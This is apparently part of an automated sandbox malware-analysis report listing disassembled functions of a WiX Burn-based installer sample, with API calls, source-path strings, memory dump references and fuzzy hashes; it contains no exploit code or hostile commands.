                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: Failed to open key: %ls$Failed to read value: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 47109696-2566192520
                                                                                                                                                                  • Opcode ID: 6cabb727815de78f18815ee95f2f9c536cc01db2af9a5f416c7cbcc91ad273de
                                                                                                                                                                  • Instruction ID: 2035e71f2461c27a93f0cc62f7f8793a1f8bd5a0ae2e3d596db1b7f713153025
                                                                                                                                                                  • Opcode Fuzzy Hash: 6cabb727815de78f18815ee95f2f9c536cc01db2af9a5f416c7cbcc91ad273de
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E118672A40228BBDF225E94CC07FFE7A69DB45714F044110FB9476190D2B58E61F7D1
                                                                                                                                                                  Function 00917337 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917357
                                                                                                                                                                  • Failed while running , xrefs: 00917345
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostWindow
                                                                                                                                                                  • String ID: Failed while running $d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3618638489-2348268852
                                                                                                                                                                  • Opcode ID: 5bdd1ef5a7c9cf5fe0916fc15961b5a337ba4f85db8151d2d07dc12869e865d8
                                                                                                                                                                  • Instruction ID: e8f22b63c2c5c239c5bd2ecb398b28a1ca593e56e7524e326a611e8698f9c942
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bdd1ef5a7c9cf5fe0916fc15961b5a337ba4f85db8151d2d07dc12869e865d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 9311A132B0420EBADB11ABE4DC06FEEF6BCAB44710F104526F915E1091E7749AD5EB90
                                                                                                                                                                  Function 009197A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 009197B5
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
                                                                                                                                                                    • Part of subcall function 00918AA9: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 00918B61
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 009197D8
                                                                                                                                                                  • Failed to set variant value., xrefs: 009197FF
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919811
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3109562764-867371702
                                                                                                                                                                  • Opcode ID: 064badb03e35f190dbc9cc297a8daf171605411369086309ae3693c8acfef55a
                                                                                                                                                                  • Instruction ID: a279bffe7cdefadaa722a7ac339292b8a6f4b447c572e1834622ff30394a6910
                                                                                                                                                                  • Opcode Fuzzy Hash: 064badb03e35f190dbc9cc297a8daf171605411369086309ae3693c8acfef55a
                                                                                                                                                                  • Instruction Fuzzy Hash: F6019671F4021CBADB21AB95CC16FDFBA6CAF81B50F104162B504B6291D6B09A809790
                                                                                                                                                                  Function 0094996C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55serviceCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ControlService.ADVAPI32(0094984C,00000001,?,00000000,00000000,?,?,?,?,?,?,0094984C,00000000), ref: 00949994
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,0094984C,00000000), ref: 0094999E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ControlErrorLastService
                                                                                                                                                                  • String ID: Failed to stop wusa service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                  • API String ID: 4114567744-2199517983
                                                                                                                                                                  • Opcode ID: cfd94845ee419dd9406852b1120baffc67f3427c788ca1a5832d8c7b57b39fe7
                                                                                                                                                                  • Instruction ID: 83898515ec735dbd745b2f1c7f370af204f4a7a6a2dbbde94f5ae23122b1f940
                                                                                                                                                                  • Opcode Fuzzy Hash: cfd94845ee419dd9406852b1120baffc67f3427c788ca1a5832d8c7b57b39fe7
                                                                                                                                                                  • Instruction Fuzzy Hash: A201D873B5022877DB1096699C45FAFB6ACAB89B54F014129FD04FB280E574EC4046E5
                                                                                                                                                                  Function 00916C99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00925766: GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 00925793
                                                                                                                                                                    • Part of subcall function 00925766: FreeLibrary.KERNEL32(?), ref: 009257BA
                                                                                                                                                                    • Part of subcall function 00925766: GetLastError.KERNEL32 ref: 009257C4
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 00916DBC
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00916DCB
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 00916C99
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00916D30
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCriticalDeleteErrorFreeHandleLastLibraryProcSection
                                                                                                                                                                  • String ID: Failed to start bootstrapper application.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 835895727-2315492815
                                                                                                                                                                  • Opcode ID: 889a558d4751fea9fea5482ede29d7bfc29a2f2fd1f65f0c13f81430fc273b2e
                                                                                                                                                                  • Instruction ID: 1d2f952ad2eb1fa254708c2c03234700ec726ea4931b20c151d0a285c614d468
                                                                                                                                                                  • Opcode Fuzzy Hash: 889a558d4751fea9fea5482ede29d7bfc29a2f2fd1f65f0c13f81430fc273b2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 18118076F00218FBDB01ABA4EC86FEDBB7CAB48319F044065F215B50D1D3B59A90DB65
                                                                                                                                                                  Function 00973B63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0091E202,0100147D,?,?,00000000,00000000), ref: 00973B7B
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0091E202,0100147D,?,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 00973B85
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastSize
                                                                                                                                                                  • String ID: Failed to get size of file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 464720113-3816715765
                                                                                                                                                                  • Opcode ID: af9cfb017971990f636f6c0ab60f44d01315a040ba3f523638a16eed154cb36b
                                                                                                                                                                  • Instruction ID: 103a131c3cfae89661f6d9b39d960a0031fc6c36b6f3f6630ad2435e1baed373
                                                                                                                                                                  • Opcode Fuzzy Hash: af9cfb017971990f636f6c0ab60f44d01315a040ba3f523638a16eed154cb36b
                                                                                                                                                                  • Instruction Fuzzy Hash: 880184B3A10229BFD7105B44DC46EBEBBACEF85754F01811ABD08A7240E2B4AE00D7E0
                                                                                                                                                                  Function 00970474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00970489
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009704DB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                                  • API String ID: 344208780-608482133
                                                                                                                                                                  • Opcode ID: 76a38fd24077170168b8d00c6a39490604a587afdf842922a6a44ed025667382
                                                                                                                                                                  • Instruction ID: a6cfede1a355c5a1f5a33fe97b4c76e20d5cbfcbb760e85b449708517d193165
                                                                                                                                                                  • Opcode Fuzzy Hash: 76a38fd24077170168b8d00c6a39490604a587afdf842922a6a44ed025667382
                                                                                                                                                                  • Instruction Fuzzy Hash: C901A733640224F7C7211A049C48F6F7AACDBC5B64F158055FE0CA7260D6758D41D6E0
                                                                                                                                                                  Function 00911839 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009113DA: GetModuleHandleW.KERNEL32(kernel32,00000000,009115E3,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113ED
                                                                                                                                                                    • Part of subcall function 009113DA: GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113F9
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                  • GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp, xrefs: 00911888, 0091188D, 0091189F
                                                                                                                                                                  • Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32., xrefs: 00911893
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$HandleLibraryLoadModule
                                                                                                                                                                  • String ID: Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                  • API String ID: 4252302101-2751505537
                                                                                                                                                                  • Opcode ID: cb83d0969de3c864af4c4a83d62821e240aa0228b416f5dfdd2bd8e369c42c58
                                                                                                                                                                  • Instruction ID: 43e2e7f4f2b825401c4a53583d5d54a7aaeb3197ac27d8276259b41ad1d918c6
                                                                                                                                                                  • Opcode Fuzzy Hash: cb83d0969de3c864af4c4a83d62821e240aa0228b416f5dfdd2bd8e369c42c58
                                                                                                                                                                  • Instruction Fuzzy Hash: D201F237B4113877DB216A548C0AFDF7A58AB45BA0F01C5A9FF08BB290E6708C8097D4
                                                                                                                                                                  Function 00925766 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 00925793
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 009257BA
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009257C4
                                                                                                                                                                  Strings
                                                                                                                                                                  • BootstrapperApplicationDestroy, xrefs: 0092578B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                  • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                  • API String ID: 1144718084-3186005537
                                                                                                                                                                  • Opcode ID: 3a284ad9523155210e1169314b3efa35071d16bcbd30e5096df449eded932d2c
                                                                                                                                                                  • Instruction ID: 708eacf2a18f61050f14dfbc03fc1e5df6cfbc86d3f11b01f220fa772d084dd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a284ad9523155210e1169314b3efa35071d16bcbd30e5096df449eded932d2c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B018036941629EBCB109F95EC44A5EFBBCFF04765F11816AE819A7654D730DD408BC0
                                                                                                                                                                  Function 0096D789 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00927A20,00916CF2,EstimatedSize,000000FF,00916CF2,00000000,?,00929AF0,00000000,00000390,000000F8,00916CF2,009331C1,00000000,00000000), ref: 0096D7AD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID: EstimatedSize$Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 3702945584-416555833
                                                                                                                                                                  • Opcode ID: 3c8a05f045c657c4e5dd8d4aec4899ad62c8a047f7e776a20aa9b008a13fe194
                                                                                                                                                                  • Instruction ID: 451661ad6ba6c07306787f8a77597a11ebbb86c192d39730fe5ec95ecb731b47
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c8a05f045c657c4e5dd8d4aec4899ad62c8a047f7e776a20aa9b008a13fe194
                                                                                                                                                                  • Instruction Fuzzy Hash: F5F0F6B77012197BE7205A169C09F9F7B5DEBC6B60F054026BB24EB290EA718D0296F0
                                                                                                                                                                  Function 0097003B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00917D5B), ref: 00970050
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009700A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                                  • API String ID: 344208780-608482133
                                                                                                                                                                  • Opcode ID: 5a1b722e612c3a3c295fa1ed5eeaa052cdb3fbb48afd403ec0eeee18f89e2288
                                                                                                                                                                  • Instruction ID: 1486cf34b17c093f2ad6cac449fbb0f75fbf1d464f3c41b773ba245670a7f910
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a1b722e612c3a3c295fa1ed5eeaa052cdb3fbb48afd403ec0eeee18f89e2288
                                                                                                                                                                  • Instruction Fuzzy Hash: 47012633641624F7D7311A049C0EFAF36A8ABC5B60F158069FD0CAB240D7B59C40D6D0
                                                                                                                                                                  Function 00971185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringOrdinal.KERNEL32(00000000,00000009,00000008,0000000D,00000001,00000000,00000001,?,00971359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014), ref: 0097119A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00971359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014,00000015,00000010,00000011,0000000C,0000000D,00000008,00000009), ref: 009711A6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastOrdinalString
                                                                                                                                                                  • String ID: Failed to compare version substrings$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                  • API String ID: 2427233125-1336685116
                                                                                                                                                                  • Opcode ID: ce31c5a1081a1f8b1346d484a50a380489d1b6f0d3417553eb84eba65deee7c2
                                                                                                                                                                  • Instruction ID: 8c84f967525aa81f3e9631effb3f2511d0e25d97b39b4ba765868f6f866874c6
                                                                                                                                                                  • Opcode Fuzzy Hash: ce31c5a1081a1f8b1346d484a50a380489d1b6f0d3417553eb84eba65deee7c2
                                                                                                                                                                  • Instruction Fuzzy Hash: 17F0283368032977DB215E999C0AF9B7F5CEF98BA0F014401FE08AE291E6B1CC50C6E0
                                                                                                                                                                  Function 009205D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                  • String ID: BundleExtensionDestroy
                                                                                                                                                                  • API String ID: 1144718084-3206861012
                                                                                                                                                                  • Opcode ID: c605d6a620918635b663eed762860f0adab9c65e15ceb14f21dc3affd011196d
                                                                                                                                                                  • Instruction ID: a483e9258421475f2c41835e32e25a72e2d9ced2bb74d572ffaa6ccc102985ba
